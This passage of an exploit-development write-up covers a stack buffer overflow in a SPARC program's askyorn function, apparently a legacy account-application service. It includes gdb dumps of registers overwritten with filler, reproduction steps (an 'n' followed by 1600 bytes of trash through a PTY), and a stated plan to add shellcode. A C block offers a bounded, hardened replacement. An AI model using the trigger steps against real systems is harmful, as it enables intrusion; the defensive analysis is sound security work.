---Type <return> to continue, or q <return> to quit---
i4             0xff33c008       -13385720
i5             0x0      0
fp             0xffbefd40       0xffbefd40
i7             0x11630  71216
y              0x0      0
psr            0xfe401005       -29356027
wim            0x0      0
tbr            0x0      0
pc             0x12b28  0x12b28 <askyorn+248>
npc            0x12b2c  0x12b2c <askyorn+252>
fsr            0x0      0
csr            0x0      0
(gdb) x/96x $sp
0xffbef8c0:     0x000291a0      0x00028d91      0xff000000      0x00ff0000
0xffbef8d0:     0x0000ff00      0x81000000      0x7efefeff      0x81010100
0xffbef8e0:     0x00000000      0x00029190      0xff343a54      0x00000000
0xffbef8f0:     0xff33c008      0x00000000      0xffbefd40      0x00011630
0xffbef900:     0x00000000      0xff342fb0      0x00013da8      0x00000000
0xffbef910:     0x000292d1      0x00000024      0x00013da4      0x80000000
0xffbef920:     0x00000000      0x0000006e      0x00000000      0x00000000
0xffbef930:     0x6e414141      0x41414141      0x41414141      0x41414141
0xffbef940:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbef950:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbef960:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbef970:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbef980:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbef990:     0x41414141      0x41414141      0x41414141      0x41414141
---Type <return> to continue, or q <return> to quit---
0xffbef9a0:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbef9b0:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbef9c0:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbef9d0:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbef9e0:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbef9f0:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefa00:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefa10:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefa20:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefa30:     0x41414141      0x41414141      0x41414141      0x41414141
(gdb) x/5i $pc
0x12b28 <askyorn+248>:  ret
0x12b2c <askyorn+252>:  restore
0x12b30 <mkpasswd>:     save  %sp, -136, %sp
0x12b34 <mkpasswd+4>:   st  %i0, [ %fp + 0x44 ]
0x12b38 <mkpasswd+8>:   add  %fp, -28, %g1
(gdb) si
0x00012b2c in askyorn ()
(gdb) 0x00011638 in Acct ()
(gdb) 0x0001163c in Acct ()
(gdb) 0x00011640 in Acct ()
(gdb) $ ^M^Mj: not found
$ unknown mode: cho
$ ^M^M: not found
$ $
^M^M: not found
$ stty cooked
$
$ exit
(gdb) x/5i $pc
0x11640 <Acct+384>:     be  0x114f4 <Acct+52>
0x11644 <Acct+388>:     nop
0x11648 <Acct+392>:     call  0x1320c <quit>
0x1164c <Acct+396>:     nop
0x11650 <Acct+400>:     b  0x114f4 <Acct+52>
(gdb) x/96x $sp
0xffbefd40:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefd50:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefd60:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefd70:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefd80:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefd90:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefda0:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefdb0:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefdc0:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefdd0:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefde0:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefdf0:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefe00:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefe10:     0x41414141      0x41414141      0x41414141      0x41414141
---Type <return> to continue, or q <return> to quit---
0xffbefe20:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefe30:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefe40:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefe50:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefe60:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefe70:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefe80:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefe90:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefea0:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefeb0:     0x41414141      0x41414141      0x41414141      0x41414141
(gdb) i r
g0             0x0      0
g1             0x0      0
g2             0x0      0
g3             0x0      0
g4             0x0      0
g5             0x0      0
g6             0x0      0
g7             0x0      0
o0             0x0      0
o1             0x29190  168336
o2             0xff343a54       -13354412
o3             0x0      0
o4             0xff33c008       -13385720
o5             0x0      0
---Type <return> to continue, or q <return> to quit---
sp             0xffbefd40       0xffbefd40
o7             0x11630  71216
l0             0x41414141       1094795585
l1             0x41414141       1094795585
l2             0x41414141       1094795585
l3             0x41414141       1094795585
l4             0x41414141       1094795585
l5             0x41414141       1094795585
l6             0x41414141       1094795585
l7             0x41414141       1094795585
i0             0x41414141       1094795585
i1             0x41414141       1094795585
i2             0x41414141       1094795585
i3             0x41414141       1094795585
---Type <return> to continue, or q <return> to quit---
i4             0x41414141       1094795585
i5             0x41414141       1094795585
fp             0x41414141       0x41414141
i7             0x41414141       1094795585
y              0x0      0
psr            0xfe401001       -29356031
wim            0x0      0
tbr            0x0      0
pc             0x11640  0x11640 <Acct+384>
npc            0x11644  0x11644 <Acct+388>
fsr            0x0      0
csr            0x0      0
(gdb)

Often you can't even see what you type, because the echo has to be turned off for some reason. It gets tough: you cannot CTRL-C out of the session into GDB because the terminal is in RAW MODE, so I set a breakpoint:

b *0x00012b28

which is inside askyorn, just before the ret/restore. Note that it will take another ret/restore to load the infected return address,
and I have to suffer through the breakpoint once before the point I actually wanted (not bad really, that's lucky). Once I found a good breakpoint, I went through the program until it broke, then put my terminal into cooked mode by invoking the gdb shell and calling

stty cooked; stty echo;

That's what let me get the pretty gdb printouts again.

In summary, to get to this wonderful stack vulnerability location:
1) say you're a new user
2) type in your name / username / password twice, then hit 'x'
3) at the 'X', do an 'n' without hitting CTRL-J, followed immediately by 1600 bytes of buffer trash.
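The disassembly above shows where that 1600 bytes of trash goes: askyorn reads its answer with gets() into a fixed stack buffer at %fp-1040 and only ever inspects the first character. As an added illustration (not code from the apply sources, which I don't have in C form for this function), here is the function reconstructed from the disassembly in a comment, alongside a bounded replacement that rejects and counts over-long answers instead of letting them run past the buffer. The 1024-byte buffer size, the function names askyorn_safe/parse_yorn/read_line, and the yorn_overlong_count metric are my assumptions; the accepted characters (0x59 'Y', 0x79 'y', 0x4e 'N', 0x6e 'n') and the 10-try loop come straight from the listing.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <string.h>

#define YORN_BUF   1024  /* assumed from the %fp-1040 buffer; not stated on the page */
#define YORN_TRIES 10    /* the original loops while its counter is <= 9 */

/* Answers rejected for exceeding the buffer; a spike here is the signal a
 * wrapper or log line would report (constructed metric, not in the original). */
int yorn_overlong_count = 0;

/* Reconstruction of the original logic from the disassembly, for comparison:
 *   int askyorn(char *question) {
 *       char buf[1024]; int i, c;
 *       for (i = 0; i <= 9; i++) {
 *           printf("%s (y or n)? ", question);
 *           gets(buf);                            <-- no length limit at all
 *           c = buf[0];
 *           if (c == 'Y' || c == 'y') return 1;
 *           if (c == 'N' || c == 'n') return 0;
 *           printf("Please answer y or n.\n");
 *       }
 *       return 0;
 *   }
 */

/* Classify the first character of an answer: 1 = yes, 0 = no, -1 = invalid. */
int parse_yorn(const char *line)
{
    switch (line[0]) {
    case 'Y': case 'y': return 1;
    case 'N': case 'n': return 0;
    default:            return -1;
    }
}

/* Bounded line read. Returns 0 on EOF with nothing read, 1 on a complete
 * line, 2 when the line did not fit (the rest of it is discarded). */
static int read_line(FILE *in, char *buf, size_t size)
{
    if (fgets(buf, (int)size, in) == NULL)
        return 0;
    size_t n = strlen(buf);
    if (n > 0 && buf[n - 1] == '\n') {
        buf[n - 1] = '\0';
        return 1;
    }
    if (n < size - 1)               /* short final line without a newline */
        return 1;
    int c;                          /* buffer full: drain the over-long line */
    while ((c = fgetc(in)) != EOF && c != '\n')
        ;
    return 2;
}

/* Hardened replacement: same contract as the original, no unbounded read. */
int askyorn_safe(FILE *in, FILE *out, const char *question)
{
    char buf[YORN_BUF];
    for (int tries = 0; tries < YORN_TRIES; tries++) {
        fprintf(out, "%s (y or n)? ", question);
        int st = read_line(in, buf, sizeof buf);
        if (st == 0)
            return 0;               /* EOF: treat as "no" */
        if (st == 2) {
            yorn_overlong_count++;
            fprintf(out, "Answer too long; try again.\n");
            continue;
        }
        int r = parse_yorn(buf);
        if (r >= 0)
            return r;
        fprintf(out, "Please answer y or n.\n");
    }
    return 0;
}

/* Drive askyorn_safe from an in-memory string so it can be exercised offline. */
int askyorn_from_string(const char *input, const char *question)
{
    char sink[1024];
    FILE *in  = fmemopen((void *)input, strlen(input), "r");
    FILE *out = fmemopen(sink, sizeof sink, "w");
    if (in == NULL || out == NULL)
        return -1;
    int r = askyorn_safe(in, out, question);
    fclose(in);
    fclose(out);
    return r;
}

/* The input pattern from the write-up, constructed here: an 'n' with no
 * newline, 1600 filler bytes, then a newline and a proper answer. */
int simulate_overlong_input(void)
{
    char input[1 + 1600 + 1 + 2 + 1];
    input[0] = 'n';
    memset(input + 1, 'A', 1600);
    memcpy(input + 1601, "\ny\n", 4);       /* includes the terminating NUL */
    yorn_overlong_count = 0;
    return askyorn_from_string(input, "Do you want to just forget the whole thing");
}

int main(void)
{
    int r = askyorn_safe(stdin, stdout, "Do you already have an account with us");
    printf("answer=%d overlong=%d\n", r, yorn_overlong_count);
    return 0;
}
```

With the bounded read, the 'n' plus 1600 bytes is truncated at the buffer, the remainder is drained, the attempt is counted and the prompt repeats; the following 'y' is then answered normally. That counter is the cheap place to hang a log line if you are watching an interactive service like this for overflow attempts.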

The follow-up here would be to use the getsmashoffset program I created to help locate exactly how many bytes it takes to reach the %fp, and then to smash the fuck out of it with some shellcode in the PTY buffer instead of 'A'.

Checking PTY buffer send size
I originally got back to the promised land by using

write (fd_master,buff2,200);

and I sent enough increments of 200 to total 1600, followed by a CTRL-J.
I have now tested that

write (fd_master,buff2,1600);

will also work just right.
